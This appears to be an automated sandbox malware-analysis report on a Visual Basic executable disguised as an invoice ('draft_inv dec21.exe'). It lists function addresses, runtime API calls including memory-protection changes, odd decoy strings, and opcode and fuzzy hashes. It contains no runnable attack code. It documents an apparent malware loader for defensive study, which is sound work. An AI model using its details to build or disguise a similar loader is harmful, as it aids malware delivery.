Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 6052f33b2c2038301f4686190df6d7cc371d5686cfb0096da507e28e387a2c8d
Instruction ID: 76c6297cc1f772e70ee7c5e08f53811e16111f7cb0b3c7e257856991d41af7af
Opcode Fuzzy Hash: 6052f33b2c2038301f4686190df6d7cc371d5686cfb0096da507e28e387a2c8d
Instruction Fuzzy Hash: 74F0A0361092468BDB246E3D8C556EF72A6DF826A0FCA090AC8C6C7A04D33088CB8613

Uniqueness

Uniqueness Score: -1.00%

Function 0242132C, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 0242132C

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 646101f0522893d45309d9d220bde8717aa7ab26792d1740f463147966613f2c
Instruction ID: 301643168c500faa55582ea7b0a689a0c7ff73e4b124e4ae828e7fefa4e8fd07
Opcode Fuzzy Hash: 646101f0522893d45309d9d220bde8717aa7ab26792d1740f463147966613f2c
Instruction Fuzzy Hash: B6D05E3399C188DFE3541E64D84509437206B9B260F14098481A04AB50C3320150AF20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 024302FD, Relevance: 5.1, Strings: 4, Instructions: 139COMMON

Download Yara Rule

Strings

SY, xrefs: 02430385
Th7S, xrefs: 0243051C
`, xrefs: 0243050A
j+, xrefs: 02430447

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: SY$Th7S$`$j+
API String ID: 0-3335159331
Opcode ID: c7c62078b61bede459ccefb27ac95c5c450e6bf47d782856ac862f9a3402fbec
Instruction ID: cc338b5f3152c6ec7b68bdf503205aad86e8f1cf21c4b34e53fa105b0c4097ad
Opcode Fuzzy Hash: c7c62078b61bede459ccefb27ac95c5c450e6bf47d782856ac862f9a3402fbec
Instruction Fuzzy Hash: B1412936240249ABDF399D7989A53DE33E39F957A0F99822BCC8A47154D77142CB8B02

Uniqueness

Uniqueness Score: -1.00%

Function 02431671, Relevance: 4.5, Strings: 3, Instructions: 770COMMON

Download Yara Rule

Strings

uV, xrefs: 02432376
YRs[, xrefs: 02432480
^d, xrefs: 02431F2F

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: YRs[$uV$^d
API String ID: 2706961497-3629111736
Opcode ID: e3038319fb96266151cb7872c2218e51a837e8054d0d31fa6b7afee0d3d27f43
Instruction ID: 6fb32857404e0a7842d6814312009f49d6fb35b39e155204e86fd48c9b0fa9f1
Opcode Fuzzy Hash: e3038319fb96266151cb7872c2218e51a837e8054d0d31fa6b7afee0d3d27f43
Instruction Fuzzy Hash: D5521A315083858FDF36DE3889987DA7BA2AF56360F4981ABCCDD8F296D3348546C712

Uniqueness

Uniqueness Score: -1.00%

Function 0242A671, Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

$V, xrefs: 0242A8F7

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: $V
API String ID: 0-3786400807
Opcode ID: dbd024a8f8128dcab72c210d1eb453b10956a5f0d439dfe73197a5d1085ee864
Instruction ID: 61da1449e249fd6cf46d055841021bc1ee423dbc626861add1290a3b68f6ff52
Opcode Fuzzy Hash: dbd024a8f8128dcab72c210d1eb453b10956a5f0d439dfe73197a5d1085ee864
Instruction Fuzzy Hash: 6BD18A7160431A9FEB20AE768D907EB37A7FF55390F95852EDC8AD7250D7348886CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0242D058, Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010a57e3606c38095b513f516705dc5296a1a09756cc7e3180c64c7162092322
Instruction ID: 23ecf06977ef3ac39338c4c777df45b0e2ee01f7aeb80715ca7921e728b6fed8
Opcode Fuzzy Hash: 010a57e3606c38095b513f516705dc5296a1a09756cc7e3180c64c7162092322
Instruction Fuzzy Hash: 01D12230A0038ADFDF34AE65CD907EE33A6AF45390F95852ECD8A9B254D7354986CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0242C50C, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a211b370e98cb772c5a49a62cbda055a250cbb424e4cb5c35790c5bd25df58d
Instruction ID: 4e714cee0616b23e0d24f535b291c6ff3e31f66fb153b6b7f07eba9fa1231e3a
Opcode Fuzzy Hash: 5a211b370e98cb772c5a49a62cbda055a250cbb424e4cb5c35790c5bd25df58d
Instruction Fuzzy Hash: 0CF0E5367816440BEB1ADE4CC5E17A6B3D39B86990F98C07BE8CB8B710C319D88A9511

Uniqueness

Uniqueness Score: -1.00%

Function 0242F610, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d21eab13cd2da2d02b2e39463d7b3fcd95d25abd7d3303d35b9ec91630853a3
Instruction ID: f3d03c19947f0485d6fef13fcbf0bef54752870cfb99fecd6799335596db1621
Opcode Fuzzy Hash: 5d21eab13cd2da2d02b2e39463d7b3fcd95d25abd7d3303d35b9ec91630853a3
Instruction Fuzzy Hash: D0B09239215644CFCA65CA09C090F4073B0F714A40FC24481E4028BE21C228E949C900

Uniqueness

Uniqueness Score: -1.00%

Function 024308D3, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041D120, Relevance: 149.2, APIs: 76, Strings: 9, Instructions: 455COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00403588,00000011), ref: 0041D1A4
#652.MSVBVM60(?,?), ref: 0041D1C0
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041D1EB
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041D1F9
#523.MSVBVM60(Vibrator), ref: 0041D20C
__vbaStrMove.MSVBVM60 ref: 0041D21D
#717.MSVBVM60(00000002,?,00000040,00000000), ref: 0041D240
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041D24A
__vbaStrMove.MSVBVM60 ref: 0041D255
__vbaFreeVar.MSVBVM60 ref: 0041D25A
__vbaFPInt.MSVBVM60 ref: 0041D274
#660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 0041D297
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041D2BF
__vbaFreeVarList.MSVBVM60(00000003,00000004,0000000A,?), ref: 0041D2D4
__vbaUbound.MSVBVM60(00000001,?), ref: 0041D2EC
__vbaGenerateBoundsError.MSVBVM60 ref: 0041D30F
__vbaUI1I4.MSVBVM60 ref: 0041D32C
#702.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041D360
__vbaStrMove.MSVBVM60 ref: 0041D371
__vbaFreeVar.MSVBVM60 ref: 0041D376
#628.MSVBVM60(Rebaptize,000000A7,00000004), ref: 0041D3A0
__vbaStrMove.MSVBVM60 ref: 0041D3AB
__vbaStrCmp.MSVBVM60(Skilderiernes,00000000), ref: 0041D3B3
__vbaFreeStr.MSVBVM60 ref: 0041D3C5
__vbaFreeVar.MSVBVM60 ref: 0041D3CE
__vbaStrCat.MSVBVM60(nothingness,?), ref: 0041D3E2
__vbaStrMove.MSVBVM60 ref: 0041D3ED
#593.MSVBVM60(00000002), ref: 0041D401
__vbaFreeVar.MSVBVM60 ref: 0041D40C
__vbaAryDestruct.MSVBVM60(00000000,?,0041D489), ref: 0041D465
__vbaFreeStr.MSVBVM60 ref: 0041D470
__vbaFreeStr.MSVBVM60 ref: 0041D475
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041D47C
__vbaFreeStr.MSVBVM60 ref: 0041D481
__vbaFreeStr.MSVBVM60 ref: 0041D486

Strings

UAb, xrefs: 0041D412
Tetum, xrefs: 0041D72C
|, xrefs: 0041D392
Skilderiernes, xrefs: 0041D3AE
Vibrator, xrefs: 0041D207
Rebaptize, xrefs: 0041D38D
efteraarsdagens, xrefs: 0041D2AB
nothingness, xrefs: 0041D3DD
forskellige, xrefs: 0041D1D7

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$DestructList$#523#593#628#652#660#702#717BoundsConstruct2ErrorGenerateUbound
String ID: Rebaptize$Skilderiernes$Tetum$UAb$Vibrator$efteraarsdagens$forskellige$nothingness$|
API String ID: 2449467680-1858127604
Opcode ID: 553de0c6dae1b927fd49fb16e6e17a2d976455ff5639dd5bb85a8676dd8bc52a
Instruction ID: 75c9f5884d4450d9cbc45e44677762e7fe80e7c1f1364c2f314bb7438bb20e1c
Opcode Fuzzy Hash: 553de0c6dae1b927fd49fb16e6e17a2d976455ff5639dd5bb85a8676dd8bc52a
Instruction Fuzzy Hash: A702AEB0D00249DFCB04DFA4DD84ADDFBB9EF48300F10816AE516A72A1DB785A49CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7C0, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401386), ref: 0041D7DE
#564.MSVBVM60(00000004,?), ref: 0041D873
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041D88F
__vbaVarTstGe.MSVBVM60(00008003,?), ref: 0041D8C6
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041D8DD
__vbaRedim.MSVBVM60(00000080,00000001,00000011,00000011,00000001,0000004E,00000000,?,?,00401386), ref: 0041D90F
__vbaLbound.MSVBVM60(00000001,?), ref: 0041D925
__vbaNew2.MSVBVM60(0040304C,0041F49C), ref: 0041D948
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040303C,00000014), ref: 0041D9AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040305C,000000F0), ref: 0041DA11
__vbaStrMove.MSVBVM60 ref: 0041DA42
__vbaFreeObj.MSVBVM60 ref: 0041DA4B
__vbaOnError.MSVBVM60(000000FF,?,?,00401386), ref: 0041DA74
__vbaVarDup.MSVBVM60 ref: 0041DA9B
#717.MSVBVM60(?,?,00000080,00000000), ref: 0041DAB0
__vbaVar2Vec.MSVBVM60(?,?), ref: 0041DABE
__vbaAryMove.MSVBVM60(?,?), ref: 0041DACC
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041DADC
__vbaAryDestruct.MSVBVM60(00000000,?,0041DB5F), ref: 0041DB43
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041DB4F
__vbaFreeStr.MSVBVM60 ref: 0041DB58

Strings

Perispheric, xrefs: 0041DA81

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$CheckHresult$DestructListMove$#564#717ChkstkErrorLboundNew2RedimVar2
String ID: Perispheric
API String ID: 1515481650-1911509959
Opcode ID: dfee14f9c2cac8bd4cac5253a19e770d55700ce9858bcd40cc4eff58ff904c86
Instruction ID: a5b5d2a99b2d2e620e879364083d152e0ecfc9f28be2dd0bf9e39a4b37078852
Opcode Fuzzy Hash: dfee14f9c2cac8bd4cac5253a19e770d55700ce9858bcd40cc4eff58ff904c86
Instruction Fuzzy Hash: 33A1F8B1900218EFEB14DF90CD49BDEBBB4BF48704F108199E6497B290D7B45A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00405445, Relevance: 37.6, APIs: 25, Instructions: 128COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(00000000,?,00000001), ref: 0041D4F7
__vbaAryConstruct2.MSVBVM60(?,004035A4,00000011), ref: 0041D508
__vbaUI1I2.MSVBVM60 ref: 0041D52B
__vbaUI1I2.MSVBVM60 ref: 0041D537
__vbaUI1I2.MSVBVM60 ref: 0041D544
__vbaUI1I2.MSVBVM60 ref: 0041D551
__vbaUI1I2.MSVBVM60 ref: 0041D55E
__vbaUI1I2.MSVBVM60 ref: 0041D56B
__vbaUI1I2.MSVBVM60 ref: 0041D578
__vbaUI1I2.MSVBVM60 ref: 0041D585
__vbaUI1I2.MSVBVM60 ref: 0041D592
__vbaUI1I2.MSVBVM60 ref: 0041D59F
__vbaUI1I2.MSVBVM60 ref: 0041D5AC
__vbaUI1I2.MSVBVM60 ref: 0041D5B9
__vbaUI1I2.MSVBVM60 ref: 0041D5C6
__vbaUI1I2.MSVBVM60 ref: 0041D5D3
__vbaUI1I2.MSVBVM60 ref: 0041D5E0
__vbaUI1I2.MSVBVM60 ref: 0041D5ED
__vbaUI1I2.MSVBVM60 ref: 0041D5FA
__vbaUI1I2.MSVBVM60 ref: 0041D607
__vbaUI1I2.MSVBVM60 ref: 0041D614
__vbaUI1I2.MSVBVM60 ref: 0041D621
__vbaUI1I2.MSVBVM60 ref: 0041D62E
__vbaUI1I2.MSVBVM60 ref: 0041D63B
__vbaUI1I2.MSVBVM60 ref: 0041D648
__vbaAryDestruct.MSVBVM60(00000000,?,0041D67E), ref: 0041D66E
__vbaFreeStr.MSVBVM60 ref: 0041D677
__vbaErrorOverflow.MSVBVM60 ref: 0041D693
__vbaStrCopy.MSVBVM60 ref: 0041D6E9
#703.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041D710
__vbaStrMove.MSVBVM60 ref: 0041D71B
__vbaFreeVar.MSVBVM60 ref: 0041D72A
#693.MSVBVM60(Tetum), ref: 0041D731
#546.MSVBVM60(00000006), ref: 0041D73F
__vbaVarMove.MSVBVM60 ref: 0041D74B
#594.MSVBVM60(00000006), ref: 0041D763
__vbaFreeVar.MSVBVM60 ref: 0041D76C
__vbaFreeStr.MSVBVM60(0041D799), ref: 0041D788
__vbaFreeVar.MSVBVM60 ref: 0041D78D
__vbaFreeStr.MSVBVM60 ref: 0041D796

Memory Dump Source

Source File: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$CopyMove$#546#594#693#703Construct2DestructErrorOverflow
String ID:
API String ID: 1821956300-0
Opcode ID: 276f5d8b087a1817ee8a0c37f1c71dc3b6d8d859fe0a9670f2ef45c3bc641476
Instruction ID: 744bf56689329ecfb7d9c3738c395e2af4faec626c193e459a012e1305416721
Opcode Fuzzy Hash: 276f5d8b087a1817ee8a0c37f1c71dc3b6d8d859fe0a9670f2ef45c3bc641476
Instruction Fuzzy Hash: F3518E74E051898FD708CBA8C4506AEFFB6AF99300F18C1AF895557382C97D9946CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB90, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

#647.MSVBVM60(?,?), ref: 0041DBE7
#669.MSVBVM60 ref: 0041DBED
__vbaVarTstEq.MSVBVM60(?,?), ref: 0041DC05
__vbaFreeVarList.MSVBVM60(00000003,?,?,00008008), ref: 0041DC1B
__vbaLenBstr.MSVBVM60(Prepoison), ref: 0041DC32
__vbaStrI4.MSVBVM60(00000000), ref: 0041DC39
__vbaStrMove.MSVBVM60 ref: 0041DC4A
#648.MSVBVM60(?,?), ref: 0041DC5E
#697.MSVBVM60(00000000), ref: 0041DC68
__vbaStrMove.MSVBVM60 ref: 0041DC73
__vbaStrCat.MSVBVM60(00000000), ref: 0041DC7C
__vbaStrMove.MSVBVM60 ref: 0041DC83
__vbaStrCat.MSVBVM60(Magreste5,00000000), ref: 0041DC8B
__vbaStrMove.MSVBVM60 ref: 0041DC92
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041DC9E
__vbaFreeVar.MSVBVM60 ref: 0041DCAA
__vbaFreeStr.MSVBVM60(0041DCF4), ref: 0041DCEC
__vbaFreeStr.MSVBVM60 ref: 0041DCF1

Strings

Prepoison, xrefs: 0041DC2D
Magreste5, xrefs: 0041DC86

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$List$#647#648#669#697Bstr
String ID: Magreste5$Prepoison
API String ID: 947445861-2627493581
Opcode ID: 830d6ff1bac82f8f894ffa2886372c4969ca9bda8cbacce08f78a2c83168ea0e
Instruction ID: dabd4e16dc9dad85780c7a1f4318e0d4eb483da765cefd3ccf976883ed15c337
Opcode Fuzzy Hash: 830d6ff1bac82f8f894ffa2886372c4969ca9bda8cbacce08f78a2c83168ea0e
Instruction Fuzzy Hash: C8310BB1C10229DBCB04DFE4DD859EEBBB8FB48701F10412AE502B7660DBB45945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD00, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401386), ref: 0041CD1E
#563.MSVBVM60(00000003), ref: 0041CD6A
__vbaFreeVar.MSVBVM60 ref: 0041CD83
__vbaVarDup.MSVBVM60 ref: 0041CDAC
#666.MSVBVM60(?,00000003), ref: 0041CDBA
__vbaStrVarVal.MSVBVM60(?,?,000000F0), ref: 0041CDCD
#514.MSVBVM60(00000000), ref: 0041CDD4
__vbaStrMove.MSVBVM60 ref: 0041CDDF
__vbaFreeStr.MSVBVM60 ref: 0041CDE8
__vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041CDF8
__vbaOnError.MSVBVM60(000000FF,?,?,00401386), ref: 0041CE0A
__vbaFreeStr.MSVBVM60(0041CE3E), ref: 0041CE37

Strings

windir, xrefs: 0041CD98

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$#514#563#666ChkstkErrorListMove
String ID: windir
API String ID: 33530242-2916395732
Opcode ID: 91d8efd7c70174f85feff9719a20ffbfc6033871ccea7cfd83422a6a9558f87d
Instruction ID: e6aa579f0c8a9049a8ca56547832f1436beca04575eff99866e7828044be11d6
Opcode Fuzzy Hash: 91d8efd7c70174f85feff9719a20ffbfc6033871ccea7cfd83422a6a9558f87d
Instruction Fuzzy Hash: B931EE75800248EBDB04DFD4DA89BDEBBB8FF48705F108129F502BB6A4DB745689CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405452, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041D6E9
#703.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041D710
__vbaStrMove.MSVBVM60 ref: 0041D71B
__vbaFreeVar.MSVBVM60 ref: 0041D72A
#693.MSVBVM60(Tetum), ref: 0041D731
#546.MSVBVM60(00000006), ref: 0041D73F
__vbaVarMove.MSVBVM60 ref: 0041D74B
#594.MSVBVM60(00000006), ref: 0041D763
__vbaFreeVar.MSVBVM60 ref: 0041D76C
__vbaFreeStr.MSVBVM60(0041D799), ref: 0041D788
__vbaFreeVar.MSVBVM60 ref: 0041D78D
__vbaFreeStr.MSVBVM60 ref: 0041D796

Strings

Tetum, xrefs: 0041D72C

Memory Dump Source

Source File: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$#546#594#693#703Copy
String ID: Tetum
API String ID: 3424027556-905628157
Opcode ID: 1c594da98886357eb65e8d38022c995777a8108b6059d57a3536aa68669309b3
Instruction ID: debbb4de43000b17f5aa814ab7f2311e5f9ab03fc2c902e23266e0f0673469f8
Opcode Fuzzy Hash: 1c594da98886357eb65e8d38022c995777a8108b6059d57a3536aa68669309b3
Instruction Fuzzy Hash: 0B31EBB5C00219EBCB04DF94EA88ADDBB75EF48714F10822AF426B32A0DB745945CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC20, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

#611.MSVBVM60 ref: 0041CC60
__vbaStrMove.MSVBVM60 ref: 0041CC6B
#693.MSVBVM60(Tsadis6), ref: 0041CC76
#546.MSVBVM60(?), ref: 0041CC84
__vbaVarMove.MSVBVM60 ref: 0041CC90
#594.MSVBVM60(?), ref: 0041CCA8
__vbaFreeVar.MSVBVM60 ref: 0041CCB1
__vbaFreeVar.MSVBVM60(0041CCDB), ref: 0041CCCB
__vbaFreeStr.MSVBVM60 ref: 0041CCD4

Strings

Tsadis6, xrefs: 0041CC71

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$Free$Move$#546#594#611#693
String ID: Tsadis6
API String ID: 1219437212-1542986783
Opcode ID: e71565b220ca46919251fe527851be883c96b943f21f06ab68ebff1459f4ce61
Instruction ID: c94e181d5cbc1ccd1ca6a22f06e6dd056c9ae47efbf32daaefd713240a2a09f9
Opcode Fuzzy Hash: e71565b220ca46919251fe527851be883c96b943f21f06ab68ebff1459f4ce61
Instruction Fuzzy Hash: FA112E71840249EFCB04DF94DA89ADDBFB8FB08705F10402AF505B6660DB745A86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__vbaFreeVarList.MSVBVM60(00000003), ref: 0041DD99
__vbaNew2.MSVBVM60(0040304C,0041F49C), ref: 0041DDB5
__vbaHresultCheckObj.MSVBVM60(00000000,0227EA7C,0040303C,00000014), ref: 0041DDDA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040305C,0000013C), ref: 0041DE28
__vbaFreeObj.MSVBVM60 ref: 0041DE31

Strings

srlove, xrefs: 0041DE05

Memory Dump Source

Source File: 00000001.00000002.6380614840.000000000041B000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.6380393138.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.6380433179.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.6380649203.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_draft_inv dec21.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ListNew2
String ID: srlove
API String ID: 701738313-3382764130
Opcode ID: c1964454de72d40e1c5f6dd5405c93e0a22430dd1d8a3514be6bcd10a52c6aa0
Instruction ID: cac346f4a2d1903f84c4b3ca624b1a769fd7b818d32e5bf81f080fdd43c713b3
Opcode Fuzzy Hash: c1964454de72d40e1c5f6dd5405c93e0a22430dd1d8a3514be6bcd10a52c6aa0
Instruction Fuzzy Hash: 4A3191B1D01308AFDB14DFA4D985ADEBBB8EF58700F10802AE505F7255D2385909CB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: draft_inv dec21.exe PID: 2748 Parent PID: 5460 draft_inv dec21.exeCOMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Executed Functions

Function 1E8F2EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2EBA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
Instruction ID: fc3192315acec6bd124f44b7ccf4842f654bf0b2b02bc553667b7fb4015ac7e1
Opcode Fuzzy Hash: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
Instruction Fuzzy Hash: E790023130190402D510A159491474F405947D0702FD1C519A5258D15DC63588517971

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2EDA

Memory Dump Source

